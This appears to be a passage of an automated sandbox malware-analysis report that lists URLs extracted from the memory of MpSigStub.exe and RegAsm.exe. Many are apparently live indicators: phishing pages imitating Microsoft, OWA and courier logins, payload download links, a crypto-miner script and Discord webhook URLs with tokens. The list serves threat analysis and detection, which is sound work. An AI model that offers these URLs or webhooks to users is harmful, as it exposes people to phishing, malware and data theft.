Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: https://coki.me/a5oly
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: https://coki.me/az2yl
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: https://coki.me/epnq7
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: https://coki.me/xmwds
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://colintx-owaupdate.c9users.io/nmadbmt/365.html
Source: MpSigStub.exe, 00000023.00000003.18286860697.0000015B081A5000.00000004.00000001.sdmp String found in binary or memory: https://configdl.teamviewer.com/configs
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://connect.statetechlink.xyz/?e=
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://connectoutlook.email/main.php
Source: MpSigStub.exe, 00000023.00000003.18299991338.0000015B1C3DD000.00000004.00000001.sdmp String found in binary or memory: https://content.dropboxapi.com/2/files/upload
Source: MpSigStub.exe, 00000023.00000003.18299991338.0000015B1C3DD000.00000004.00000001.sdmp String found in binary or memory: https://content.dropboxapi.com/2/files/uploadxA
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp String found in binary or memory: https://contirecovery.best
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://contirecovery.info
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: https://corazonarquitectura.com/94reej6f3mr/lipa.html
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://courieroffice.net/wp-admin/whatsapp1.php
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: https://courieroffice.net/wp-content/post2.php
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://covid-19.freeworldimports.com/vendor/phpunit/phpunit/src/util/php/v/excelz/index.php
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp String found in binary or memory: https://crashpad.chromium.org/
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp String found in binary or memory: https://crashpad.chromium.org/x
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://creative-island.e-m2.net/wp-content/themes/creative_island/js/vc-composer/RUpDObeysEFp8.php
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://creativechigz.co.zw/themes/newexceltoosab.php
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode.txt
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://crowandmonk.com/90pparcels.co.uk/wp-admin/maint/redirect/?jmoore
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: https://crypto-loot.com/lib/miner.min.js
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: https://cryptopro.ga/File/apo.exe
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://cryptotreasurytrust.com/vnV
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: https://cut.ly/a2wiit8
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: https://cut.ly/nctboib
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: https://cutt.ly/tbcyxag
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: https://cutt.ly/zhqz1t6
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/PROTOCOL.certkeys?rev=HEAD
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://d.lqw.me/xuiow/
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: https://d.symcb.com/cps0%
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: https://d.symcb.com/rpa0)
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: https://d2vb4fe3wqkxl3.cloudfront.net/opt.rtf
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: https://dahamarli.xyz
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://dancevida.com/css/app.css
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: https://darmatic.co.rs/ds/1502.gif
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: https://dashboard.imadeit.com.ng/ds/151120.gif
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://dasinvestment.us/ty/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://dawnamae.000webhostapp.com/exel.phpmethod=
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: https://de.gsearch.com.de/api/update.sh
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp String found in binary or memory: https://debatestage.com/wp-admin/css/colors/blue/reportmaersk.php
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://defineliving.in/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://demottechamber.org/html
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: https://des4556yuhgfrt.gb.net/fde45tfttyt/?veg54g5=br4hg4v
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://dev-thegentlemans.teoria.agency/owa/next.php
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://dev.null.vg/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://dev1.whoatemyI
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp String found in binary or memory: https://devcellsegovapiwebapp.azurewebsites.net/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: https://dhl24.com.uk/
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: https://diarnondfireplace.com/dobo/xxx.php?user=
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://dichthuatsnu.com/goodweb/pwofiles.php
Source: MpSigStub.exe, 00000023.00000003.18344996372.0000015B1B0B0000.00000004.00000001.sdmp String found in binary or memory: https://diplomaticroll.com/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://diproelec.com.sv/moollll/excelzz
Source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: https://discord.com/api/webhooks/
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://discord.com/api/webhooks/770716126988599316/o7GXYebuPQzx7RQFUD4cTOPMq2gGicypOMyNpFVQsIb9qyVW
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: https://discord.com/api/webhooks/850115118066040833/lcFHGcD2eUjv1zEJO_Ped6EAVU7W44L8X3chfyx9YoIb7YBS
Source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp String found in binary or memory: https://discord.com/api/webhooks/x
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: https://discordapp.com/api/webhooks/757994001767989269/f3KGimlvr5nZDHyIVt3GF4iEkqvy-je8zsM6MPhPc54x0
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp String found in binary or memory: https://divelpid.my/wp-content/themes/monolit/woocommerce/global/aaie6jbhso9.php
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: https://divineleverage.org/de.php
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://dl.dropboxusercontent.com/s/e7q3947id2jl6ux/factura6.zip?dl=0
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: https://jjjkjkeh.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://joro4wixma.azurewebsites.net/wp-admin
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: https://josematechky.com/docs/ec21_order.doc
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: https://jrat.io
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://js-cloud.com/gate.php?token=
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp String found in binary or memory: https://juniorleadersacademy.com/reporthotmail.php
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: https://jupiternepal.com/name/stducount/php/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://jusreihnt.com/dpz/?email=
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: https://kamalandcompany.com/drms/fert.html
Source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp String found in binary or memory: https://kelwinsales.com/ds/1702.gif
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: https://kenosis.ml/wp-content/upgrabe/
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://kiki-lo.online/?e=ckomorowski
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: https://kinzlerimmigration.com/wp_include/redirect/anvsawuuy2fydgvyqhridmmuy29t
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://kiosp.dyndns.dk/icon4/next.php
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://kirimliinsaat.com.tr/ui/office365
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://kiwisanagustin.com/wp-admin/includes/opo.php
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: https://kiwisanagustin.com/wp-admin/includes/opo.php%22%20method%3d%22post%22%20style%3d%22box-sizin
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://kod.haohaoda.cn/plugins/picasa/newpo.png
Source: MpSigStub.exe, 00000023.00000003.18327477882.0000015B1B65E000.00000004.00000001.sdmp String found in binary or memory: https://kofiruions.xyz/royal/brand.php
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://koirado.com/vendor/phpunit/phpunit/src/util/php/css/dir/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://konzmny.com/?qs=a9537c1ce6614636144ad0c9e0975ac106bb986006db8f6a0789e5b0d16dcf4fc15476ba5afa
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://koooking.online/webs/
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: https://kraft.eng.br/
Source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp String found in binary or memory: https://kurtoch.eu/rgfyzrxlr/ind.html
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: https://kweraltd.com/wp-content/plugins
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://l%%8Kvfcrl%%8Kvfyptl%%8Kvfoexpert.work/core/venl%%8Kvfl%%8Kvfdor/doctrine/lexer/lib/cpf9PlDn
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: https://labrie-sabette.com/wp-includes/sodiu
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://lawyersblog.net/777/picture9.dll
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: https://legalproceedings.uc.r.appspot.com/legal_proceeding_concerning_overdue_invoices_pdf.jar
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://limarija-das.hr/wp-content/plugins/wp-optimize/js/handlebars/CJrMovjhM.phpMXynE
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: https://linesburline.at/3/bbc.dll
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: https://linkr.uk/2nuds
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: https://linkr.uk/elgja
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://linkr.uk/fyu5r
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://linkzip.me/
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: https://liquide.co/3qyyerb6gvx/ind.html
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://listoparacomer.com.ve/wp-content/hewlett-packard-mcafee/hpe.html
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: https://litesound.ml/fax/policy.php
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: https://livelongerfeelbetter.com/
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: https://livesnoop.com/client/postlog.php
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: https://livesnoop.com/client/screenshots.php
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://lixns.com/xl/?referrer=
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://lmvus.com/omar/90/$8900.doc
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: https://localmonero.co/
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/geolocate?key=test
Source: RegAsm.exe, 00000008.00000002.21905650034.000000001E595000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.21910178869.000000001E986000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/
Source: RegAsm.exe, 00000008.00000002.21905650034.000000001E595000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com//
Source: RegAsm.exe, 00000008.00000002.21905650034.000000001E595000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: RegAsm.exe, 00000008.00000002.21905650034.000000001E595000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/v104
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: https://login.livevoice365.xyz/
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: https://login.microsoftonline.com/common/oauth2/
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: https://login.yahoo.com/config/login
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: https://loginmixcrhustim0fficia6.ga/xi/policy.php
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: https://logins.daum.net/accounts/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: https://logins.daum.net/accounts/logout.do?url=http%3A%2F%2Fwww.daum.net%2F%3Fnil_profile%3Dlogout
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: https://logowrench.website/zdz0ptxdtonla.php
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: https://logs1186.xiti.com/
Source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp String found in binary or memory: https://logupdate.herokuapp.com
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/ekdnl
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/htyul
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/mccwd
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/tllwu
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/welhl
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://lupoun.com/
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://lupoun.com/moon/
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: https://m3lloyellow.com/rodrich.php
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://macflypro.com/builds/data/
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://maersoul.com/vix/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: https://mail.daum.net
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: https://mail.daum.net/login?url=http%3A%2F%2Fmail.daum.net%2F
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: https://mailsending.site/Happy_CS/happyFun.exe
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://main.iam.ad.ext.azure.com/api/
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: https://malsay.myftp.biz/ck/business/index.php
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: https://mamulln.cl/kwi/?email=travis_phillips
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: https://marcostrombetta.com.br/ds/1802.Dc
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: https://marcostrombetta.com.br/ds/1802.gif
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://massotherapielg.com/css/acrobat/login.micosoftonline.com/index.html
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: https://maxizoner.com/presentation.dll
Source: MpSigStub.exe, 00000023.00000003.18344332390.0000015B1C1B7000.00000004.00000001.sdmp String found in binary or memory: https://mazedecrypt.top/
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://md.jp-long.online/?e=robertm
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://md.jp-long.online/?e=vpetrillo
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: https://md.klnmailbox.xyz/?e=
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://mdhov.ca/storage/mdhov/ca/next.php
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: https://mdspni.com/realm/send.php
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: https://meant.usa.cc/no/sharpoin/sharpoint/share/
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://media.discordapp.net/attachments/
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://mediadigital.site/class-vc.php
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: https://megoseri.com/app.dll%/cvr78f2.tmp.cvr
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: https://mercados247.com/ds/1602.gif
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://message-read.iosmail-inbox.host/5c36dfff53edaf584b5d9262?qlpq7hq=&amp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: https://meubackup.terra.com.br/index.php/s/4fwo4jtezhqnzdd/download
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://mhjyutrfgf.gb.net/grte544fc3/?vfegg5355=fvvbveg545
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp String found in binary or memory: https://minhafinanca.com/wp-admin/css/colors/coffee/reportexcelindeed
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: https://minisnowhair.com/minisnw2/download2.php?f=htm-2-ads19u09ue11&u=22fc8bcc-db88-4ca7-9654-81ad4
Source: MpSigStub.exe, 00000023.00000003.18327477882.0000015B1B65E000.00000004.00000001.sdmp String found in binary or memory: https://miscrsftonline.ml/blessing/policy.php
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: https://missglamourcosmeticos.com.br/ds/29.gif
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp String found in binary or memory: https://mjstech1.com/06/lub.php
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: https://mmjobserver.com/aah/next.php
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://moegifts.com/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: https://mollahossein.ir/cgi_bin/bgxlc3rlckblyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://mor32.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: https://moralsss.com/office/office365/index.php
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://moranmus.com/adobe-vix/
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: https://mort2021.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: https://msatechnology.com/admincp/wp-admin/css/colors/ectoplasm/reportexcel.php
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://mtonlino.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://mueblesmaple.com.mx/19.gif
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: https://muropronto.ibsweb.com.br/modules/mod_simplefileuploadv1.3/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: https://mycrotyx.com/cgi.bin/azure2020/realm/send.php
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://myexternalip.com/raw
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://myexternalip.com/rawx
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://mylovelybluesky.com
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://myoffice365-online.com/login/common/login/mridings
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://myscape.in/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: https://mywebscrap.com/ds/0402.gif
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://mz.ht-aslice.online/?e=a.wirth
